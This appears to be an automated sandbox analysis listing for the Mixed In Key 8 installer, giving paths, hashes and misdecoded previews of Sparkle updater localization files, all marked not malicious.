/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/el.lproj/.BC.T_FUj94r Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4422
Entropy (8bit):	5.1911339140660395
Encrypted:	false
SSDEEP:	96:Pgl6kv4oUlrZqZSkCUAEIigLADssnDT6uDSpMLPXD+BM/E6NYPZNMqFgkrXYi4:mFiNgjgL4yMLd/mZyCgkr34
MD5:	DA4EBB595EB2C4CF1BD8199EC95141AE
SHA1:	DFEF8A3FC52B07BEB322A49AEB90AC2550880193
SHA-256:	5E22748AC7C634DE19F1A0F0D32BECB495F646DF879F88FBA0F56F57372D4440
SHA-512:	BFB8435F916678EF4A291B3B4AF4B5FF26B58F91508D940F57642410F7B0483B8425C49C171E2B1F2779E171742F4C1B19F934D4249C075E002148A6919284E1
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " ...% $1 @2%@$. ... ......... .. ........ ..... ....... ....!.. . ......... . ..... ............ ...... . ................. . .1%@$. ...;.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " ...% $1 @..... ..... ..... ......... ...... ..... ...... ... ........ ........-....... ....... ..... ....... ............. . .1%@$. ... ......... ........ ..... ,............... . ...... ...,.. .. ..............."..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =.". .1%@$% $2 @....... ............ ........ ........"..;".@%% @sin woa avlibael

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/en.lproj/.BC.T_xuXclu Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4132
Entropy (8bit):	4.792047857345539
Encrypted:	false
SSDEEP:	96:HJj6Q21ra2AOpiaT7sjLJOTQL22fRgEC+NNGCWFIo4l/XV75K:pjf+raRagLccLfgf34l/VE
MD5:	2CC426B92381ABE3E2E44E43FB6D2655
SHA1:	EDA564CFCE0C270EAB65ABA0E23A6CEF28A33789
SHA-256:	11443A9A18E0DA638B61A4EDA53A87BEF3B4900662432B4663406CF7932DB207
SHA-512:	AF170445DEDA1EC65DAD7F37AC35789E1F236E8C520DF72422CE56F84687D09A82DAEC5C222ADF58503362B2075B7DA7E1314FFBB9BCFE92C6CCF22B9707450F
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !hTsii snai pmroattnu dpta;ew uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w " =%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !hTsii snai pmroattnu dpta;ew uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w;"..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ah sebned wolnaoed dna dsir aeydt osu!eW uodly uol ki eoti snatlli tna deralnuhc% $1 @on?w;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$c na..t.b epuadet dhwnei .t.. surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb-ey-uo

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/es.lproj/.BC.T_TYkkfU Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3568
Entropy (8bit):	4.881888869875779
Encrypted:	false
SSDEEP:	96:PqU6/jLmn1gALMeiVMB6LusLJOVMvCi2KM6KE9VxMYcVS4k/sZS:xsLmn2lOB6LusLcOat6Kf5k0S
MD5:	904BBB71B712CEDEF3897E39A6E2BE8E
SHA1:	8E5118B8BAE7CF21F81BBE34581C4BBA7587EFF3
SHA-256:	F89FCD9201741E9BC02500BD4D61116EE20D94004A240EFB8A346370825F14E0
SHA-512:	AC861D30DFF280025A9B4DC8D07A6CBDC8977D22EE44F61591504A291F12C15B230C1827C3CFE6B20CB07699904A27193C4242EFF5A9B80958CB82A212C35DA7
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @esh nad seacgrda o yse.tn.l siot saparu itilaz.r. L. eugtsra.. anitslarae i inicra% $1 @haro?a;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$n oesp eueda tcauilaz rucnaods ejecetu aedds enuv lomuned e.sl. oeltcru aocomi ameg nedd sioco m deoi. p.itoc .uMve a1%@$a s uacprte aedA lpcicaoien s yrtta eedi inicraold seeda ll.."..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e sal. l.itamv reis.. nidpsnobiel"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @se.t .idpsnobiel( suet ditne eal% $3)@ ...eDes aedcsraaglr aharo?a;"..%" @odnwoldade " =%" @edcsraagod;"..%" @fo% "@= " 1%@$d e2%@$;"..A"n wev reisnoo f@%i svaiaallb!e " =."H.yau ann euavv reis.. ned% .@!.;"..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fi.lproj/.BC.T_Xkk9ca Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2500
Entropy (8bit):	4.8752165718531755
Encrypted:	false
SSDEEP:	48:LJMFuI4uWIZ3wGnjEZiqeUik5NAioR18MkgLtReZR1nAEj88DFzKE:LKwOWIOKIZBjFNALR15Lt0R1AEjRoE
MD5:	8A8DB0FF1F7E062F789594FC566C8000
SHA1:	19921C6F3E817D4C31A5C23E9C3D3D39D7E82CEF
SHA-256:	1DD3B764E2F93C0238541D0C748359CBB5E88B3CAB708CBE6269FA5D5073697E
SHA-512:	0DFC6DE43FA9B23BB34F710E9B0ADA5613F2C306D0863A2B9F249AEA9E8170BC88C11578C7B713D481767F46B24FB29175A0B458E18BD731675A28138DBE596B
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$/ % $2"@.;".@%% @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e@%s attr!sW uodly uol ki eotr leuacn hon?w " =%"$1 @2%@$o nsaneentt uajo navmliiank ..ty.t.n.s uearvanak rear nuk n3%@$k ..nyintste...!nH laaukt o.ky.nnsi.t. .hoejmlnau duleelne"?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$o nuuis nastavalialo elavv reis.o;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @non tys aaativll as(nilualo n3%@$.)H laaukt oaladats nen ty"?.;".@%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p " =K"..ty.tj...ll..% @ieo elo kiueskaio jhleam naksnoino !jAtaoko jhleam aelyvitdesootts?aJ soe ,tk sy ypaauj ..jrseetml.. nly.lp.ti...jl..t..;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =U"su ievsroio jhleamts a@%o nsaneentt!u;"..A"n wev reisnoo f@%i svaiaallb!e " =U"su ievsroio jhleamts a% @nos aaativll!a

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/fr.lproj/.BC.T_veZ1xl Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3714
Entropy (8bit):	4.888751024111058
Encrypted:	false
SSDEEP:	96:PVXhc6SDI7Ah4sLhu1wp+LJO8LwgLPAwDFf8/cNSoLp5J8Zf:J6j74sLhyLcgLYwD5pUf
MD5:	225C9BA3FFB0766A5AC5D371BB6B15FF
SHA1:	AD66D63630381BAC884BD90361B0DA0C37E4E073
SHA-256:	78FDC8F099DB63A427C3143BC2E5967C054BE0A460596CB265DB9010E9F0CC65
SHA-512:	39F98DA8AB95F8B605DF0945A2A276D66F74F8F11920DB71A37C8587B5BC7CD53EC90A15FA573FF34F9347D3B9AB9BF008D29BCEA9A07CBBF0F72BFCBAE710C9
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @ a...t ..tl...hcra.g..V uoel-zovsul ..i.snatllree teralcnre% $1 @amnietantn.."?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =%"$1 @enp ue tap s..rt eim s..j uo ruqna dlif notcoinn e..p rait r.d..nuv lomu enel ceuters ueel ,ocmm enu emiga eidqseuo unul ceetruo tpqieu ..Dp.alec z1%@$d na sovrt eodssei rpAlpcitaoisn ,eralcnzel- e..p rait redl ..e t.re.ssyaze"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$e tsl aevsroi nalp ul s.rc.neetd siopinlb.e;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$e tsd siopinlb.e;.v uo stulisizel aevsroi n3%@$ .oVluzev-uo selt ...lc.ahgrrem iatnnena.t?.;"..%" @odnwoldade " =%" @.tl...hcra.g"..;".@%o f@% " =%"$1 @us r2%@$;"..A"n wev re

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/he.lproj/.BC.T_0oql0D Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2604
Entropy (8bit):	5.008724955056715
Encrypted:	false
SSDEEP:	48:LwnU1ujilOkOhDBK6X8CGeUi2AiR1LkTS1LtR3meR8whiQYt1Hs:L+UgPhdK6Xcj9Au1LyS1LtdzR8wwQY7s
MD5:	3270BA6D293CD90010791C5FF09BFD8F
SHA1:	678084F1C133B194FF3F2C23F05D9B84D1B31E95
SHA-256:	47E5E47BCDB90558D6CE23284BC7E9F7950ADBA18F0C465190BC62047F36A14B
SHA-512:	BE9F91D4CA8FCCE76805C074FF94BB5C143866B7B2DADEFA309235A64B1579AC688E5D02CC5E5854AF3F9EE6B9E0468B4A154EE453E636390DD3A82080884CFB
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @........ .... ........ ..... ....... ... ........ . .3%@$! . ..... ......."?.;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. .. ........ ..... ........"..;".@%% @sin woa avlibael( oy uahev% )@ .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. ... .....( .... . .3%@$.). ..... ......... ..?.;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " ..% @..... .... ........ ..... .......... !..... .. ....... -.d si cmiga?e. . .... ,..... ... ........ .....;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =."... ....... . .@%. .....!.;"..A"n wev reisnoo f@%i svaiaallb!e " =."... ....... . .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/hu.lproj/.BC.T_pBNyzP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2424
Entropy (8bit):	4.717127628221706
Encrypted:	false
SSDEEP:	48:LwIFT9+2I6xBb3CQcLgeUiYRIRALkHLk3LtRySGRJX+kK0:LLK2ImHjlRIRALiLuLtkSGjX+i
MD5:	FC3EA6E0077DA6182BBE7CC2FFCA1236
SHA1:	28DF08B4E8E111F7F02CA03F3157E2372A80C720
SHA-256:	2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
SHA-512:	5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/id.lproj/.BC.T_SSt3KG Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2424
Entropy (8bit):	4.717127628221706
Encrypted:	false
SSDEEP:	48:LwIFT9+2I6xBb3CQcLgeUiYRIRALkHLk3LtRySGRJX+kK0:LLK2ImHjlRIRALiLuLtkSGjX+i
MD5:	FC3EA6E0077DA6182BBE7CC2FFCA1236
SHA1:	28DF08B4E8E111F7F02CA03F3157E2372A80C720
SHA-256:	2135CF24F1C452FDEFB06C5D7051ACDF4F368D1D16B114BC085BEFC089785D31
SHA-512:	5F7E6D12914D8F832487357716993C76D7130445FE800A7EF9E889BAFD86999E4F3D39DEEE11CBB2F4D83EAF936A47EE073CFFF7FA6FB1AA09CDEA90A2BDECA9
Malicious:	false
Preview:	..%" @fo% "@= " 1%@$o f2%@$;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " 1%@$% $2 @ah sebnei snatlldea dnw li lebr aeydt osu eentxt mi e3%@$s attr!sW uodly uol ki eotr leuacn hon?w;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @sic ruertnylt ehn wese tevsroi nvaiaallb.e;"..%" @@%i son wvaiaallb ey(uoh va e@%.)W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @sin woa avlibael( oy uahev% $3)@ .oWlu doy uilekt oodnwoldai ton?w;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%d eo son tahevp reimssoi notw irett oht epalpcitaoi'n sidertcro!yA ery uor nuingno ffa d si kmiga?eI fon,ta ksy uo rystsmea mdnisirttarof roh le.p;"..A"n wev reisnoo f@%h sab ee nnitslael!d " =A"n wev reisnoo f@%h sab ee nnitslael!d;"..A"n wev reisnoo f@%i svaiaallb!e " =A"n wev reisnoo f@%i svaiaallb!e;"..A" n

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/is.lproj/.BC.T_hwNqA7 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2486
Entropy (8bit):	4.941691582568595
Encrypted:	false
SSDEEP:	48:LcMFADdR9c27BVIRJoBLohZ05MkTWCRHFLkkjSH+A9FmA8HutyNPvAAiN2:LbAZU27BVInceZ05FTpRHFLnjSH+AHMr
MD5:	658C922C387DE9085433993836674519
SHA1:	CD1BD898E900C35295BA365441EAE812987A92D1
SHA-256:	7BA6A77B194445F35D135E3C361BED3BA394D8AEBC9950F3E9FB32700177E141
SHA-512:	C6989CAEBFC7EBEF557126A1CFAD44B4CBFFD87A32186AA0DE2A33214F3D20034716E3FFCE4AA2104B32E50D5D9C739CF0521CF5D66D1651E54C8B383A17D29E
Malicious:	false
Preview:	..%" @fo% "@= " @%a f@%;"..%" @@%h sab ee nnitslael dna diwllb eerda yotu esn xe titem% @tsrast !oWlu doy uilekt oeralnuhcn wo"?= " @%% @ehuf revir..s te tni ngov re..rut li.tk. tiv..n ..ts u.rs.niug% .@V liute dnru.rs. a.nn.?a;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " @%% @ren ..ajts a..gt..af nes mref ..nael g..seass utdnni.a;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =."t.agaf% $2 @fa% $1 @ren ..f ..naeltge n...e trm .e .3%@$ .iVtl u.sk.ajh na a.nn.?a;"..%" @odsen toh va eepmrsiisnot orwti eott eha ppilacitnos'd riceotyr !rA eoy uurnnni gfo f aidksi ameg ?fIn to ,sa koyrus syet mdaimintsarot rof rehpl".= " @%h ferue kk iehmili dit l.a .ksiraf. ..mp.upf roirstni!sE tr u.a .ekry aofrrti.i .fad simkny?dE fkeiks aktl u.r.f...ar. i. giv..k reifssjt..arnn"..;". Aen wevsroi nfo% @ah sebnei snatllde"!= " .N ...gt..afa f@%h feruv re.i .estti nn"!.;". Aen wevsroi nfo% @sia avlibael"!= " .N ...gt..afa f@%e r.fa.lnge"!.;".nAe rr

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/it.lproj/.BC.T_wP55BN Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3646
Entropy (8bit):	4.843902978796583
Encrypted:	false
SSDEEP:	96:P6BpbYAlAtiQLZ4sSj25wJq3lgL3AQiZ+:aYOQL4Ry+
MD5:	C61AEA0FF202980A419D3EAC48D869A3
SHA1:	46FBDD60C2BD71A907CC52B0800486485C68DE69
SHA-256:	D85F1741E25D66D2A3C156BFE983F2AAB4390BD4580E67F502C7DD672EBE59DD
SHA-512:	4CDEE53C104BF1541D663E62FD0E2D1745B45941CF5DE9536A56674649B0649C964FE0ECC2BF5D6B82EDFC5709107D9123207CF3E2F58279A172994B0C51C766
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @..s atots aciracote d..p ortn oep rseeseru itilzzta!oD sedire initslaalere r aivvaier 1%@$o ar"?.;".1%@$c nat'b epuadet dhwnei 't surnnni grfmoa r ae-dnoylv lomu eileka d si kmiga eroa npoitac lrdvi.eM vo e1%@$t ooyruA ppilacitno sofdlre ,eralnuhci trfmot eher ,na drt ygaia.n " =I"pmsoisibela ggoinrra e1%@$q audn oivne esegeiuotd anuv lomu eids lo aelttru aocemu .n..miamigend sioco u .n..nuti..o ttci.aS optsra e1%@$n lealC raetll apAlpcizaoiin ,irvaivraole r pioraver"..;".@%% @sic ruertnylt ehn wese tevsroi nvaiaallb.e " =%"$1 @2%@$. .alv reisno eip..r ceneeta ttaumlneetd siopinibel"..;".@%% @sin woa avlibael--oy uahev% .@W uodly uol ki eotd wolnao dtin wo"?= " 1%@$% $2 @..d siopbnli;ed siopind lealv reisno e3%@$ .eDisedire esugri e.l..gaigroanemtn oro?a;"..%" @odnwoldade " =%" @csracita"o.;".@%o f@% " =%"$1 @id% $2"@.;". Aen wevsroi nfo% @sia avlibael"!=

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ja.lproj/.BC.T_nkT5Z8 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4122
Entropy (8bit):	5.670129832466164
Encrypted:	false
SSDEEP:	96:PWiZOn6/uGl8F5Q51wR8sPiz2LPJfLJOM2L4KLPS7XyNIfJ2oZae:uFnjGQQvwRyqLZLcZLhL2r2Yae
MD5:	4DD8CB383D73BC835678A965208A162A
SHA1:	AFEA320D4120BD2D3D140C8F4E34F50DF9772718
SHA-256:	A4819EC90F564A71EC906005921C8EDC090EDAAF19990E706FF49C4B24FCDCFC
SHA-512:	FACE8F4CD789A77A8AD9DFD1F731BA2AE1F2DE30912058E992D2A7F60575B6FB2C95C6E3777B7A10F3D42A803BDA4A718304D1D8E4811BC823EC93CB47F7293B
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2 @................................% $1 @..................................................?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$. ................................................................................................................%.$1 @............................................................................;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2 @....................................;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$. .................................... .

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/ko.lproj/.BC.T_8nd2UP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3490
Entropy (8bit):	5.7492033708150565
Encrypted:	false
SSDEEP:	96:PkvL6Oiv7PeAtRnLhu9LZ4LJOhLHLP45QESucBrC:YLhSbeAtRnLhMLZ4LchLHLh3dC
MD5:	2F74C221BEE30ECE6DE6B251A24091B9
SHA1:	A6D2E8B3B09BAE5D320E4B181A7CC1902FF7CF5B
SHA-256:	73D6AF660F2E59D43B1D0DE2AA0CA3E6F11E0044F3A1E29AB16FFBC3C1E312CA
SHA-512:	FA2CE6B9F798A4F48D5E4CEE0033F303592756A246F58EACA350757ABBF8A8A4D7E673357A671144DBF5D4740653421DB94BFCFB945B4F2F9652BD44A78847AE
Malicious:	false
Preview:	..%"$1 @2%@$h sab ee nodnwoldadea dni serda yotu es !oWlu doy uilekt onitsla ltia dnr leuacn h1%@$n wo"?= " 1%@$% $2.@...(.. )......... .......... ........... .............. ....... ............?.;"..%"$1 @ac'n tebu dptadew eh ntis'r nuingnf or m aerdao-ln yovuleml ki e aidksi amego rnao tpcilad irev .oMev% $1 @oty uo rpAlpcitaoisnf loed,rr leuacn htif or mhtre,ea dnt yra agni".= " 1%@$..(...).. ....... ........ .DC. ........ ...... .... ...... ........ .......... ........ .......... ... ... ..........% $1.@...(.. )............. ....... ........ ...... ....... ..........;"..%" @@%i sucrrnelt yht eenewtsv reisnoa avlibael".= " 1%@$% $2.@...(.. )..... .... .............;"..%" @@%i son wvaiaallb-ey-uoh va e@% .oWlu doy uilekt oodnwoldai ton?w " =%"$1 @2%@$..(...).. ........ .............( ..... .... . :3%@$ )......... ............?.;"..%" @odnwoldade " =%" @......... ...."..;".@%o f@% " =%"$1

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/Autoupdate.app/Contents/Resources/nl.lproj/.BC.T_QLoFEJ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3926
Entropy (8bit):	4.792603716238071
Encrypted:	false
SSDEEP:	96:PQ7ifqkrRCLhuMi83sbLXxLPjDO1PNShpGVUx+3HxZ3:M4q+RCLhtJoLXxL7DO1o03r3
MD5:	BC7B6D1A52851036451241DB1D63DF03
SHA1:	76BCE213F254401292F8432A6A2A59A646065359
SHA-256:	5BEF32AC7ED813273760E05384DD5C38B8D874BD0EF801BCDBC8359D280A2E75
SHA-512:	94F5E27807E65A977E621C62A32DE44FD55EB9F48ABDD413F9D61B1BC1009C17D013E1E7CB415D1D1CC77E54CEDE212024E5509C558CA66E369DB70B253BC51F
Malicious:	false
